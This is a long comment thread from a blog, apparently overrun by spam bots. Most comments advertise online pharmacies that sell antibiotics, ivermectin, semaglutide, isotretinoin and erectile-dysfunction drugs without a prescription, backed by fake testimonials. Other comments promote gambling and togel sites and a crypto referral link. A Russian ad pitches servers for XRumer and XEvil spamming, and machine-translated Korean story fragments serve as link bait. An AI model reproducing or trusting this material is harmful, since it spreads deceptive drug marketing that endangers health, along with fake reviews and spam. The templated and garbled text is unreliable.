  best india pharmacy: world pharmacy india – india pharmacy mail order

 541. RogerUplig says:

  Their international drug database is unparalleled. buying prescription drugs in mexico online: mexican online pharmacies prescription drugs – medication from mexico pharmacy

 542. Isqzsq says:

  levitra tablet order lanoxin 250mg online cheap buy tizanidine medication

 543. Felixethen says:

  mexico drug stores pharmacies: mexican rx online – mexican border pharmacies shipping to usa

 544. RogerUplig says:

  Long-Term Effects. indianpharmacy com: top 10 pharmacies in india – п»їlegitimate online pharmacies india

 545. Felixethen says:

  doxycycline 50 mg price australia doxycycline rx coupon buy doxycycline 40 mg

 546. Geri bildirim: porn
 547. BobbyDiobe says:

  The team embodies patience and expertise. http://edpillsotc.store/# male erection pills

 548. It’s nearly impossible to find educated people on this topic, but you sound like you know what you’re talking about! Thanks

 549. Goaorx says:

  generic coversyl brand perindopril cheap fexofenadine 180mg

 550. Jamesnen says:

  https://doxycyclineotc.store/# doxycycline 100mg india

 551. Npefvu says:

  dilantin cheap cyclobenzaprine tablet buy oxybutynin generic

 552. Felixethen says:

  ed pills online п»їerectile dysfunction medication ed medications online

 553. BobbyDiobe says:

  Their international shipment tracking system is top-notch. https://azithromycinotc.store/# generic zithromax medicine

 554. Clintben says:

  Been relying on them for years, and they never disappoint. http://indianpharmacy.life/# top 10 online pharmacy in india

 555. Aqmzjg says:

  buy baclofen 25mg online cost toradol oral ketorolac

 556. Clintben says:

  A trusted name in international pharmacy circles. https://indianpharmacy.life/# indian pharmacy paypal

 557. Dxtowb says:

  buy loratadine cheap claritin 10mg over the counter order dapoxetine without prescription

 558. Vyjlns says:

  buy baclofen 10mg online cheap amitriptyline online buy buy ketorolac online

 559. Clintben says:

  They always have the newest products on the market. http://drugsotc.pro/# family pharmacy

 560. Thank you, I have recently been searching for information approximately this topic for a while and yours is the best I have found out so far. However, what about the conclusion? Are you positive concerning the source?

 561. I was able to find good information from your blog posts.

 562. Clintben says:

  Offering a global gateway to superior medications. https://mexicanpharmacy.site/# medicine in mexico pharmacies

 563. Wrlmtw says:

  purchase alendronate pills order nitrofurantoin 100 mg without prescription purchase furadantin sale

 564. Way cool! Some very valid points! I appreciate you writing this post and also the rest of the site is also very good.

 565. Vvlpia says:

  purchase inderal for sale motrin 400mg without prescription order plavix without prescription

 566. great issues altogether, you just won a logo new reader. What could you suggest in regards to your publish that you simply made a few days ago? Any sure?

 567. Jamesgop says:

  medication from mexico pharmacy and mexico pharmacy online – buying from online mexican pharmacy

 568. Jamesgop says:

  mexican rx online and mexican pharmacy online – buying prescription drugs in mexico

 569. Lsndii says:

  order pamelor 25mg online cheap cost nortriptyline order acetaminophen generic

 570. Kyfprv says:

  buy amaryl pills for sale buy arcoxia medication oral etoricoxib 120mg

 571. Truly no matter if someone doesn’t know after that its up to other users that they will help, so here it happens.

 572. Jamesgop says:

  mexico pharmacies prescription drugs : mexico pharmacy price list – mexican border pharmacies shipping to usa

 573. RalphHab says:

  minocycline 100mg capsule: ivermectin uk – ivermectin pills canada

 574. Right now it sounds like Movable Type is the top blogging platform out there right now. (from what I’ve read) Is that what you’re using on your blog?

 575. RalphHab says:

  best online pharmacy india: canadian pharmacy india – top 10 online pharmacy in india

 576. Хотите получить идеально ровный пол в своей квартире или офисе? Обратитесь к профессионалам на сайте styazhka-pola24.ru! Мы предоставляем услуги по устройству стяжки пола в Москве и области, а также гарантиру

 577. Larrypeaph says:

  http://stromectol.icu/# minocycline 100 mg over the counter

 578. Larrypeaph says:

  http://paxlovid.bid/# paxlovid for sale

 579. снабжение строительных объектов

 580. Ernieduemi says:

  paxlovid pharmacy: antiviral paxlovid pill – Paxlovid buy online

 581. Ernieduemi says:

  how to get valtrex over the counter: valtrex antiviral drug – where can you buy valtrex

 582. I was recommended this website by my cousin. I am not sure whether this post is written by him as no one else know such detailed about my difficulty. You are wonderful! Thanks!

 583. Lggens says:

  order astelin 10ml online cheap zovirax 400mg brand buy avapro 300mg online

 584. Larrypeaph says:

  http://paxlovid.bid/# paxlovid pill

 585. Нужная услуга для идеальной отделки интерьера- это механизированная штукатурка стен. На mehanizirovannaya-shtukaturka-moscow.ru предлагаются только самые качественные услуги.

 586. JamesOpinc says:

  https://kamagra.icu/# Kamagra Oral Jelly

 587. Jerrynat says:

  https://cialis.foundation/# Tadalafil Tablet

 588. Jerrynat says:

  https://cialis.foundation/# Buy Tadalafil 5mg

 589. JamesOpinc says:

  http://viagra.eus/# Order Viagra 50 mg online

 590. Jerrynat says:

  http://cialis.foundation/# Buy Tadalafil 5mg

 591. Aw, this was an incredibly nice post. Finding the time and actual effort to produce a good article but what can I say I put things off a lot and never seem to get anything done.

 592. JamesOpinc says:

  http://kamagra.icu/# buy kamagra online usa

 593. JamesOpinc says:

  https://cialis.foundation/# Cialis 20mg price

 594. JamesItest says:

  http://kamagra.icu/# cheap kamagra

 595. JamesOpinc says:

  http://kamagra.icu/# cheap kamagra

 596. Hi there! This post couldn’t be written any better! Reading this post reminds me of my old room mate! He always kept talking about this. I will forward this page to him. Pretty sure he will have a good read. Thank you for sharing!

 597. I do believe all the ideas you have presented in your post. They are very convincing and will definitely work. Still, the posts are too quick for novices. May you please prolong them a bit from next time? Thank you for the post.

 598. I all the time used to read article in news papers but now as I am a user of web thus from now I am using net for posts, thanks to web.

 599. great submit, very informative. I’m wondering why the other experts of this sector do not realize this. You should continue your writing. I am sure, you have a huge readers’ base already!

 600. Mеханизированная штукатурка стен – это выбор современных людей. Узнайте больше на mehanizirovannaya-shtukaturka-moscow.ru.

 601. Grlijt says:

  fluconazole tablet cost cipro purchase cipro pill

 602. I don’t know if it’s just me or if everyone else experiencing problems with your blog. It looks like some of the text on your posts are running off the screen. Can someone else please comment and let me know if this is happening to them too? This might be a problem with my browser because I’ve had this happen before. Thank you

 603. autocad says:

  Every weekend i used to pay a visit this web site, because i want enjoyment, as this this site conations really nice funny stuff too.

 604. Mtivfr says:

  tadalafil online buy indomethacin 75mg uk indomethacin online order

 605. buy autocad says:

  Hi, i feel that i saw you visited my website so i got here to go back the favor?.I am trying to in finding things to improve my website!I guess its good enough to use some of your ideas!!

 606. Lonivg says:

  lamisil us casino slots play poker online free

 607. I like the valuable information you provide in your articles. I will bookmark your weblog and check again here frequently. I am quite certain I will learn many new stuff right here! Good luck for the next!

 608. We are a group of volunteers and starting a new scheme in our community. Your web site provided us with useful information to work on. You have performed an impressive activity and our whole group can be grateful to you.

 609. Tqxmno says:

  aspirin cost online casino gambling play poker online for real money

 610. Good way of explaining, and good piece of writing to take data concerning my presentation subject matter, which i am going to convey in college.

 611. Snppyg says:

  thesis website essay cefixime 100mg oral

 612. Xpddtu says:

  college essay service academicwriters gambling site

 613. Ikexvq says:

  trimox 500mg over the counter arimidex uk biaxin 500mg generic

 614. Tbfzzb says:

  rocaltrol 0.25 mg without prescription fenofibrate ca buy cheap generic fenofibrate

 615. Hqlmtn says:

  clonidine for sale online spiriva 9 mcg canada order tiotropium bromide 9 mcg sale

 616. Zmmnuv says:

  acne medication pills from dermatologist best acne medication for men trileptal 600mg uk

 617. Ljidts says:

  online sleep medication perscriptions fda hair net requirements 2024 diet master pills from mexico

 618. This piece of writing is really a good one it helps new web users, who are wishing for blogging.

 619. Nsarnh says:

  letrozole over the counter generic albendazole abilify 20mg usa

 620. Thank you for sharing your info. I truly appreciate your efforts and I am waiting for your next post thank you once again.

 621. This article is in fact a nice one it helps new internet viewers, who are wishing for blogging.

 622. Rfemef says:

  quit smoking antidepressant medication pain reliever meds strong prescribed pain killers

 623. Tqpjib says:

  medroxyprogesterone 10mg cost buy microzide 25mg hydrochlorothiazide 25 mg pill

 624. Its like you read my mind! You seem to understand so much approximately this, like you wrote the ebook in it or something. I feel that you simply could do with some p.c. to drive the message house a bit, however other than that, this is great blog. An excellent read. I’ll definitely be back.

 625. Aynaxv says:

  pills for herpes breakouts inhalers online without an rx type 1 diabetes drugs list

 626. Splfmp says:

  buy cyproheptadine 4 mg fluvoxamine oral buy nizoral

 627. Yehcpd says:

  most effective antifungal cream antibiotics for genital herpes high blood pressure medicine list

 628. I’m really enjoying the design and layout of your blog. It’s a very easy on the eyes which makes it much more enjoyable for me to come here and visit more often. Did you hire out a designer to create your theme? Excellent work!

 629. Odqklj says:

  buy cheap cymbalta buy duloxetine no prescription provigil 100mg uk

 630. Vvqudi says:

  duodenitis treatment guidelines abnormal endoscopy pictures immediate relief for uti

 631. Seltnv says:

  buy promethazine generic over the counter ed pills that work ivermectin tablet price

 632. I love it when individuals come together and share views. Great blog, continue the good work!

 633. Great web site you’ve got here.. It’s hard to find good quality writing like yours these days. I seriously appreciate people like you! Take care!!

 634. Drpfxz says:

  birth control pill prescription online can you get contraceptive pill from pharmacy is semenax a scam

 635. Ivyeiz says:

  prednisone 20mg drug buy amoxil 500mg amoxil sale

 636. Tjwpco says:

  best drug for heartburn best over counter heartburn medicine best tablet for bloating stomach

 637. Hi there, this weekend is pleasant for me, because this occasion i am reading this wonderful informative piece of writing here at my house.

 638. Aotyyp says:

  azithromycin online order buy generic neurontin buy gabapentin generic

 639. Zdbyhd says:

  buy actigall pills buy cetirizine 5mg pills cetirizine 10mg over the counter

 640. Xmpvyj says:

  buy atomoxetine paypal buy atomoxetine generic order sertraline 100mg generic

 641. This article is actually a good one it helps new net users, who are wishing for blogging.

 642. Qgmhpu says:

  order lasix for sale how to buy doxycycline buy albuterol inhalator online cheap

 643. Zsptpw says:

  buy lexapro 10mg for sale cost revia naltrexone 50 mg generic

 644. razumlike says:

  Ad discendum, non ad docendum — Для изучения, но не для поучения.
  http://batmanapollo.ru

 645. Urbwth says:

  ipratropium 100 mcg over the counter buy cheap generic linezolid order zyvox without prescription

 646. Fantastic beat ! I wish to apprentice while you amend your site, how can i subscribe for a blog web site? The account aided me a acceptable deal. I had been tiny bit acquainted of this your broadcast provided bright clear concept

 647. Gfcucz says:

  order augmentin 1000mg generic amoxiclav for sale order clomid 50mg online cheap

 648. hellobanana says:

  I’m not sure why but this web site is loading extremely slow for me. Is anyone else having this issue or is it a problem on my end? I’ll check back later and see if the problem still exists.

 649. Slerqs says:

  order generic starlix 120 mg starlix medication order candesartan 16mg pills

 650. Jfsdth says:

  oral levitra 20mg vardenafil 10mg us buy hydroxychloroquine 200mg pills

 651. Xxytjn says:

  buy tegretol sale carbamazepine buy online order lincocin pill

 652. Jsiktf says:

  cost cenforce 100mg buy chloroquine generic metformin 500mg canada

 653. Keep this going please, great job!

 654. Qiywgy says:

  order duricef 250mg sale ascorbic acid 500 mg generic purchase epivir

 655. Yovzmq says:

  buy lipitor 80mg generic zestril 10mg pills order prinivil sale

 656. Htmmle says:

  buy cheap cabergoline cost cabergoline 0.5mg dapoxetine 90mg generic

 657. Mhouqh says:

  medrol pills brand aristocort 4mg clarinex ca

 658. Bmetxm says:

  purchase misoprostol generic diltiazem 180mg price order generic diltiazem 180mg

 659. Ieoxkx says:

  purchase piracetam pills buy betnovate 20 gm cream anafranil us

 660. Daqlbw says:

  purchase acyclovir sale order rosuvastatin online cheap cheap crestor 10mg

 661. Uvgrbo says:

  buy sporanox online cheap buy prometrium 100mg generic where to buy tindamax without a prescription

 662. Ihyyug says:

  ezetimibe over the counter buy cheap generic zetia buy generic sumycin for sale

 663. Siyglt says:

  olanzapine ca order zyprexa without prescription order diovan

 664. Lvyybo says:

  flexeril over the counter cyclobenzaprine 15mg tablet oral toradol

 665. tusrtgou says:

  Фильм холоп смотреть. Холопы. Холоп фильм 2024 смотреть онлайн бесплатно в хорошем качестве hd 1080 бесплатно полностью лорд фильм. Холоп смотреть онлайн бесплатно в хорошем. Фильм холоп смотреть онлайн бесплатно в хорошем качестве. Холоп актеры.

 666. Xgspda says:

  gloperba for sale buy colcrys pill order methotrexate 5mg generic

 667. Jrnigk says:

  adult acne caused by medication retino-a gel for sale prescription oral medication for acne

 668. aeblerts says:

  Теоретиком политического лидерства является. Лидерство в области охраны труда обеспечивается. Что означает понятие интегративная функция в теории лидерства. Нарративное лидерство. Поведенческие теории лидерства. Ситуационное лидерство институт тренинга. Модель ситуационного лидерства херси и бланшара.

 669. lcauakmr says:

  Джон максвелл лидерство. Ситуационная теория лидерства общая характеристика. Теория ситуационного лидерства херси бланшара. Внутренняя политика и лидерство. Альфред лансинг лидерство во льдах. Лаборатория лидерства. Современные теории лидерства. Ситуационная теория лидерства. Лидерство это в менеджменте.

 670. Etzzfs says:

  best off counter seasonal allergy cetirizine generic alternative to antihistamine for allergy

 671. Tzizry says:

  natural way to eliminate gerd best fast acting heartburn relief

 672. gxhbtzab says:

  Лидерство купить. Лидерство в теории менеджмента можно определить как. Лидерство тренинг. Управление и лидерство для начинающих руководителей. Особенности политического лидерства. Типы научных теорий руководства и лидерства.

 673. Pbzrgw says:

  order sleeping tablets online uk modafinil cheap

 674. zvmtvhyt says:

  Смотреть фильмы в онлайн кинотеатре в хорошем качестве. Совместный просмотр фильмов: список сайтов и сервисов. ФИЛЬМЫ ОНЛАЙН БЕСПЛАТНО. Смотреть фильмы онлайн в хорошем качестве. Фильмы новинки которые уже вышли смотреть онлайн. Фильмы в хорошем качестве, Кино смотреть онлайн бесплатно. Фильмы 2023 новинки смотреть онлайн бесплатно.

 675. Аренда VPS/VDS сервера
  – Управляйте серверами на лету.
  – Почасовая оплата
  – Отлично подходит под XRumer + XEvil
  – Супер (аптайм, скорость, пинг, нагрузка)
  – Скорость порта подключения к сети интернет — 1000 Мбит/сек
  – Outline VPN, WireGuard VPN, IPsec VPN.
  – Более 15 000 сервер уже в работе
  – FASTPANEL и HestiaCP – бесплатно
  – Возможность арендовать сервер на 1 час или 1 сутки
  – Отлично подходит под A-Parser
  – Автоматическая установка Windows – бесплатно
  – Отлично подходит под GSA Search Engine Ranker
  – Дата-центр в Москве и Амстердаме
  – Отлично подходит под CapMonster
  – Мгновенное развёртывание сервера в несколько кликов – бесплатно
  – Windows – 2022, 2019, 2016, 2012 R2
  – Windows – 2012 R2, 2016, 2019, 2022 – бесплатно
  – Ubuntu, Debian, CentOS, Oracle 9 – бесплатно
  – Быстрые серверы с NVMe.
  – Круглосуточная техническая поддержка – бесплатно
  – Отлично подходит под Xneolinks
  – Для сервера сеть на скорости 1 Гбит!

 676. Ekjfqm says:

  order deltasone 10mg online cheap order prednisone 20mg generic

 677. Сделайте свой первый шаг к большому выигрышу с lucky jet онлайн! Веселье и возможности для заработка ждут вас после регистрации на 1win.

 678. This post reminds me of something important. Kudos!

 679. Informasinya bermanfaat dan mudah dicerna. Suka!

 680. Wdtzvs says:

  heartburn treatment over the counter zyloprim 300mg pill

 681. goltogel says:

  Stellar content! I’m eager to join as a writer. Can you guide me on applying?

 682. Great blog! I’m considering a writing role. Could you share details on the application process?

 683. website says:

  What’s up friends, how is everything, and what you wish for to say about this article, in my view its in fact remarkable in favor of me.

 684. Uwyegk says:

  teenage acne treatment for girls order zovirax creams prescription acne medications brand names

 685. ivistroy.ru says:

  I don’t even know how I ended up here, but I thought this post was good. I don’t know who you are but definitely you are going to a famous blogger if you are not already 😉 Cheers!

 686. Wlgoip says:

  kirkland allergy pills toronto order albuterol 2mg antihistamine generic names

 687. daa4a.ru says:

  Wow that was strange. I just wrote an really long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyways, just wanted to say superb blog!

 688. daa4a.ru says:

  Hi there, I desire to subscribe for this weblog to get latest updates, so where can i do it please help.

 689. Qiiyeu says:

  nsaid with least stomach problems buy accupril 10 mg pills

 690. Askoxync says:

  Друг проходил через трудный период. Подарил ему яркий букет от “Цветов.ру”. Цветы стали символом поддержки и дружбы. Рекомендую всем, кто хочет поднять настроение близким. Советую! Вот ссылка https://worldcup2021.ru/yanaul/ – цветов

 691. Fnwici says:

  accutane canada order isotretinoin pills accutane where to buy

 692. Askoxync says:

  Заказал потрясающий букет на “Цветов.ру” для свидания с девушкой. Цветы сразу создали атмосферу волшебства, а ее улыбка стала самым ценным моментом вечера. Рекомендую “Цветов.ру” для создания моментов, которые запомнятся на всю жизнь. Советую! Вот ссылка https://%D0%BF%D1%80%D0%BE%D0%BA%D0%B0%D1%8238.%D1%80%D1%84/samara/ – магазин цветов

 693. Askoxync says:

  Жена исполнилось годика старше, и я хотел порадовать ее необычным букетом. Заказал на “Цветов.ру” яркий микс. Улыбка на ее лице – лучшая рекомендация для этого сервиса. Советую! Вот ссылка https://4prosound.ru/oskol/ – заказ цветов с доставкой

 694. Fdjnnz says:

  order amoxicillin 500mg pill amoxicillin pills order amoxil 1000mg online

 695. mozglolo says:

  Ad majorem Dei gloriam — К вящей славе Божией
  http://batmanapollo.ru

 696. Qdzufv says:

  online sleep prescriptions sleeping pills online order

 697. psyxgogo says:

  Everything has a second side (У всего есть вторая сторона)
  http://batmanapollo.ru

 698. Azzqiq says:

  azithromycin 500mg generic cost zithromax 250mg buy azithromycin 500mg sale

 699. Uaopvc says:

  purchase azithromycin generic purchase azipro online cheap buy azithromycin sale

 700. Roapwv says:

  order lasix without prescription buy furosemide generic

 701. read website says:

  Hey there I am so excited I found your site, I really found you by mistake, while I was searching on Google for something else, Nonetheless I am here now and would just like to say thank you for a incredible post and a all round thrilling blog (I also love the theme/design), I dont have time to look over it all at the minute but I have saved it and also included your RSS feeds, so when I have time I will be back to read a great deal more, Please do keep up the fantastic b.

 702. Hzyrax says:

  omnacortil 40mg usa buy prednisolone 40mg buy prednisolone for sale

 703. Txxmys says:

  generic amoxicillin 250mg amoxicillin 500mg without prescription buy amoxicillin paypal

 704. Its like you read my mind! You seem to know so much approximately this, like you wrote the book in it or something. I think that you could do with some % to drive the message house a bit, however other than that, this is great blog. An excellent read. I’ll definitely be back.

 705. Txpssb says:

  order albuterol inhalator without prescription buy ventolin generic buy albuterol inhalator online

 706. Vcfrcs says:

  buy clavulanate tablets buy augmentin 375mg for sale

 707. Dkiwpn says:

  buy vardenafil 10mg pills order levitra pills

 708. Icvdqh says:

  purchase tizanidine generic buy zanaflex pills buy tizanidine

 709. I like the helpful information you provide in your articles.
  I will bookmark your weblog and check again here frequently.

  I’m quite sure I will learn many new stuff right here!

  Good luck for the next!

 710. Lino says:

  Hey there, You have done an incredible job. I’ll certainly digg it and personally suggest to my friends.
  I am sure they will be benefited from this site.

 711. 에그 벳 says:

  baseballoutsider.com
  Hongzhi 황제는 “산책하는 것이 좋은데 왜 좋아하지 않습니까? “라고 웃었습니다.

 712. 에그벳300 says:

  doeaccforum.com
  Suleiman이 홀에 들어서자 사람들이 몰려들었습니다.

 713. Xmforn says:

  deltasone 10mg sale deltasone uk buy prednisone cheap

 714. Venetta says:

  Attractive section of content. I just stumbled upon your web
  site and in accession capital to assert that I get actually
  enjoyed account your blog posts. Any way I’ll be subscribing to your feeds
  and even I achievement you access consistently fast.

 715. socialmediatric.com
  Zhu Zaimo는 “Xu Pengju, 닥쳐”라고 날카롭게 말했다.

 716. Axhdzi says:

  order rybelsus 14 mg online cheap semaglutide 14 mg generic buy generic semaglutide

 717. Sirmhr says:

  accutane 20mg pills where to buy accutane without a prescription accutane 10mg usa

 718. this-is-a-small-world.com
  그러나 이 순간 주후조는 많은 사람들에게 둘러싸인 의기양양한 장군처럼 보였다.

 719. Uiulrj says:

  generic rybelsus 14 mg order rybelsus 14 mg generic buy rybelsus 14mg generic

 720. HenryGen says:

  После перехода на здоровое питание, я осознал, насколько важен свежий, натуральный продукт. Благодарю ‘Все соки’ за их качественный маслопресс. Теперь я делаю своё собственное масло дома, что гарантирует его чистоту и натуральность. https://h-100.ru/collection/maslopressy – Маслопресс – это было отличное вложение в моё здоровье!

 721. HenryGen says:

  Когда я решил улучшить своё питание, мне понадобилась надежная соковыжималка шнековая. Благодарен компании ‘Все соки’ за их качественное оборудование. Теперь я делаю свежие соки каждое утро. https://h-100.ru/collection/shnekovye-sokovyzhimalki – Соковыжималка шнековая — это лучшее, что я добавил в свой рацион!

 722. HenryGen says:

  Изменив свои пищевые привычки, я понял, что мне необходима качественная ручная соковыжималка. Благодаря компании ‘Все соки’, я нашёл идеальный вариант. Теперь свежие соки – неотъемлемая часть моего рациона. https://h-100.ru/collection/ruchnye-shnekovye-sokovyzhimalki – Ручная соковыжималка от ‘Все соки’ превосходно справляется со своей задачей!

 723. Eubfdi says:

  generic allergy pills ventolin inhalator without prescription ventolin online

 724. Nhudyi says:

  amoxicillin 250mg canada order amoxil pills buy amoxicillin medication

 725. 소닉슬롯 says:

  this-is-a-small-world.com
  그러나 이러한 방식으로 측량 및 매핑 수준의 향상은 분할 시공의 가능성도 제공합니다.

 726. Eiqbrt says:

  order amoxiclav augmentin 1000mg usa buy generic augmentin 375mg

 727. Fwxnng says:

  purchase azithromycin sale buy zithromax 250mg for sale azithromycin 250mg oral

 728. agonaga.com
  Concubine Fang은 주저하고 천천히 병 뚜껑을 들어 올렸고 이상한 향기가 그녀의 마음에 곧바로 돌진했습니다.

 729. baseballoutsider.com
  이것이 팡지판이 직접 연기하는 것을 좋아하지 않는 이유이기도 하다.

 730. linetogel says:

  🌌 Wow, this blog is like a fantastic adventure soaring into the galaxy of excitement! 💫 The thrilling content here is a captivating for the mind, sparking awe at every turn. 🎢 Whether it’s technology, this blog is a source of exciting insights! #AdventureAwaits Embark into this cosmic journey of imagination and let your imagination soar! 🚀 Don’t just read, immerse yourself in the thrill! 🌈 🚀 will thank you for this thrilling joyride through the worlds of endless wonder! ✨

 731. Yjqfte says:

  buy levothroid for sale order levoxyl online levothyroxine online buy

 732. chasemusik.com
  이 아들은 아무리 봐도 팔꿈치가 바깥쪽으로 향하고 있는 하얀 눈의 늑대처럼 보입니다.

 733. Avptsm says:

  buy omnacortil 5mg pill prednisolone 5mg pill omnacortil usa

 734. togel online says:

  💫 Wow, this blog is like a rocket blasting off into the universe of endless possibilities! 🎢 The captivating content here is a captivating for the imagination, sparking awe at every turn. 🎢 Whether it’s inspiration, this blog is a goldmine of exhilarating insights! #AdventureAwaits Dive into this cosmic journey of knowledge and let your imagination soar! 🌈 Don’t just enjoy, savor the excitement! #BeyondTheOrdinary Your mind will be grateful for this exciting journey through the dimensions of endless wonder! ✨

 735. linetogel says:

  💫 Wow, this blog is like a rocket soaring into the galaxy of endless possibilities! 🎢 The thrilling content here is a thrilling for the mind, sparking awe at every turn. 🌟 Whether it’s inspiration, this blog is a goldmine of exhilarating insights! #AdventureAwaits 🚀 into this cosmic journey of discovery and let your imagination fly! 🌈 Don’t just explore, savor the thrill! 🌈 Your brain will thank you for this thrilling joyride through the realms of discovery! 🌍

 736. netovideo.com
  Fang Jifan은 “아버지, 아들이 물어볼 것이 있습니다. “라고 말했습니다.

 737. tsrrub.com
  Wang Ao의 표정은 매우 추악했지만 Liu Yan의 표정은 더욱 나빴습니다.

 738. Pexkxj says:

  oral clomiphene clomiphene generic clomiphene ca

 739. Zjmrjf says:

  cheap neurontin generic gabapentin 100mg cheap neurontin 100mg over the counter

 740. slot online says:

  💫 Wow, this blog is like a rocket soaring into the galaxy of excitement! 💫 The captivating content here is a thrilling for the mind, sparking curiosity at every turn. 🎢 Whether it’s inspiration, this blog is a source of exhilarating insights! #InfinitePossibilities 🚀 into this cosmic journey of discovery and let your mind soar! 🌈 Don’t just explore, immerse yourself in the excitement! #FuelForThought Your mind will thank you for this thrilling joyride through the dimensions of endless wonder! 🌍

 741. 🌌 Wow, this blog is like a fantastic adventure launching into the galaxy of endless possibilities! 🌌 The captivating content here is a captivating for the imagination, sparking excitement at every turn. 🎢 Whether it’s lifestyle, this blog is a source of exhilarating insights! #InfinitePossibilities Embark into this thrilling experience of knowledge and let your thoughts soar! ✨ Don’t just enjoy, experience the excitement! #FuelForThought Your mind will thank you for this thrilling joyride through the dimensions of discovery! ✨

 742. Woah! I’m really enjoying the template/theme of this site. It’s simple, yet effective. A lot of times it’s difficult to get that “perfect balance” between superb usability and visual appeal. I must say that you’ve done a awesome job with this. Additionally, the blog loads very fast for me on Opera. Outstanding Blog!

 743. 소닉슬롯 says:

  10yenharwichport.com
  물론… 직설적으로 훈계하는 것에는 또 다른 더 깊은 의미가 있습니다.

 744. Oracify says:

  The material is really appealing. ampliar senza prescrizione in Italia

 745. eggc says:

  baseballoutsider.com
  Ruan Wen은 열 줄을 보았지만 잠시였습니다.

 746. Fuujea says:

  buy lasix 100mg buy furosemide 40mg generic buy furosemide pills

 747. Cxjfgz says:

  buy sildenafil 100mg generic buy viagra online cheap order viagra 100mg for sale

 748. An impressive share! I have just forwarded this onto a colleague who had been doing a little research on this. And he in fact bought me lunch simply because I discovered it for him… lol. So let me reword this…. Thank YOU for the meal!! But yeah, thanx for spending time to discuss this topic here on your web site.

 749. this-is-a-small-world.com
  Francisco Peerless는 짜증이 났지만 “공격, 공격!”

 750. Pgwsuw says:

  buy doxycycline medication brand doxycycline 200mg buy generic acticlate

 751. Piefkh says:

  order rybelsus online buy rybelsus 14mg without prescription semaglutide 14 mg sale

 752. amruthaborewells.com
  너무 오만하고 지배적 인 길을 실제로 막았습니다.

 753. 10yenharwichport.com
  Fang Jifan의 이전 말은 Zhu Houzhao의 불만을 불러 일으켰습니다.

 754. modernkarachi.com
  이러면 안되는데, 그런 사소한 일인데 책도 보러 가나?

 755. 10yenharwichport.com
  Liu Wenshan은 “선생님은 학생들에게 무엇을 가르치고 싶습니까? “라고 말했습니다.

 756. masakra.ru says:

  Hi there! This is my 1st comment here so I just wanted to give a quick shout out and tell you I genuinely enjoy reading through your articles. Can you suggest any other blogs/websites/forums that go over the same subjects? Appreciate it!

 757. I all the time used to read article in news papers but now as I am a user of web so from now I am using net for articles or reviews, thanks to web.

 758. I have read so many posts concerning the blogger lovers but this article is in fact a pleasant piece of writing, keep it up.

 759. mydwg.ru says:

  Greetings! Very helpful advice within this article! It is the little changes which will make the most important changes. Thanks a lot for sharing!

 760. Thank you, I have recently been searching for information approximately this topic for ages and yours is the best I have found out so far. However, what about the conclusion? Are you sure about the source?

 761. I am really loving the theme/design of your site. Do you ever run into any web browser compatibility problems? A couple of my blog audience have complained about my blog not operating correctly in Explorer but looks great in Safari. Do you have any solutions to help fix this issue?

 762. nadachee.ru says:

  I’m not sure why but this website is loading incredibly slow for me. Is anyone else having this issue or is it a problem on my end? I’ll check back later and see if the problem still exists.

 763. I simply could not leave your web site prior to suggesting that I really enjoyed the standard information a person supply for your visitors? Is going to be back regularly in order to inspect new posts

 764. We are a group of volunteers and starting a new scheme in our community. Your site provided us with valuable information to work on. You have done an impressive job and our whole community will be grateful to you.

 765. always i used to read smaller articles or reviews which also clear their motive, and that is also happening with this post which I am reading at this time.

 766. Great info. Lucky me I found your site by accident (stumbleupon). I have book marked it for later!

 767. I’m really enjoying the design and layout of your blog. It’s a very easy on the eyes which makes it much more enjoyable for me to come here and visit more often. Did you hire out a designer to create your theme? Great work!

 768. Fantastic goods from you, man. I’ve understand your stuff previous to and you’re just too wonderful. I really like what you’ve acquired here, really like what you’re stating and the way in which you say it. You make it entertaining and you still take care of to keep it sensible. I cant wait to read far more from you. This is actually a terrific site.

 769. Magnificent beat ! I wish to apprentice while you amend your site, how can i subscribe for a blog site? The account aided me a acceptable deal. I had been tiny bit acquainted of this your broadcast provided bright clear concept

 770. I really love your site.. Excellent colors & theme. Did you make this website yourself? Please reply back as I’m looking to create my very own website and want to know where you got this from or what the theme is called. Cheers!

 771. It is perfect time to make a few plans for the longer term and it is time to be happy. I have read this post and if I may I wish to recommend you few fascinating things or advice. Perhaps you could write next articles referring to this article. I want to read more things approximately it!

 772. remstrdom.ru says:

  It’s enormous that you are getting ideas from this article as well as from our argument made here.

 773. sadounik.ru says:

  I savor, cause I found exactly what I used to be taking a look for. You have ended my 4 day long hunt! God Bless you man. Have a nice day. Bye

 774. sadounik.ru says:

  Thank you for sharing your info. I truly appreciate your efforts and I am waiting for your next post thank you once again.

 775. It is not my first time to pay a visit this site, i am visiting this website dailly and take nice information from here every day.

 776. Hey There. I found your blog using msn. This is an extremely well written article. I will be sure to bookmark it and come back to read more of your useful information. Thanks for the post. I will definitely comeback.

 777. Do you have a spam issue on this site; I also am a blogger, and I was wanting to know your situation; many of us have created some nice procedures and we are looking to trade methods with other folks, be sure to shoot me an e-mail if interested.

 778. Tremendous things here. I’m very satisfied to peer your article. Thank you so much and I’m looking forward to touch you. Will you please drop me a mail?

 779. Excellent blog here! Also your site quite a bit up fast! What host are you the use of? Can I am getting your associate link on your host? I want my website loaded up as fast as yours lol

 780. yes-cars.ru says:

  Hi i am kavin, its my first time to commenting anywhere, when i read this piece of writing i thought i could also make comment due to this brilliant piece of writing.

 781. yes-dacha.ru says:

  Magnificent beat ! I wish to apprentice while you amend your site, how can i subscribe for a blog web site? The account aided me a acceptable deal. I had been tiny bit acquainted of this your broadcast provided bright clear concept

 782. What i do not realize is in reality how you’re not really a lot more well-liked than you may be right now. You are so intelligent. You know therefore significantly on the subject of this matter, produced me personally believe it from numerous various angles. Its like men and women don’t seem to be fascinated unless it’s something to accomplish with Woman gaga! Your own stuffs great. Always maintain it up!

 783. nadachee.ru says:

  Hi there, its nice piece of writing regarding media print, we all understand media is a great source of data.

 784. Wow, that’s what I was looking for, what a data! present here at this weblog, thanks admin of this website.

 785. After looking at a few of the blog articles on your web page, I honestly like your way of blogging. I bookmarked it to my bookmark website list and will be checking back soon. Take a look at my web site as well and let me know what you think.

 786. I love it when folks come together and share opinions. Great blog, keep it up!

 787. saungsantoso.com
  그러나 그들이 계속해서 책을 읽으면 그들 중 절반 이상이 얼굴에 다시 슬픈 표정을 지었습니다.

 788. Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me? https://accounts.binance.com/cs/register-person?ref=GJY4VW8W

 789. Ajofkl says:

  buy xenical buy diltiazem 180mg sale diltiazem 180mg cheap

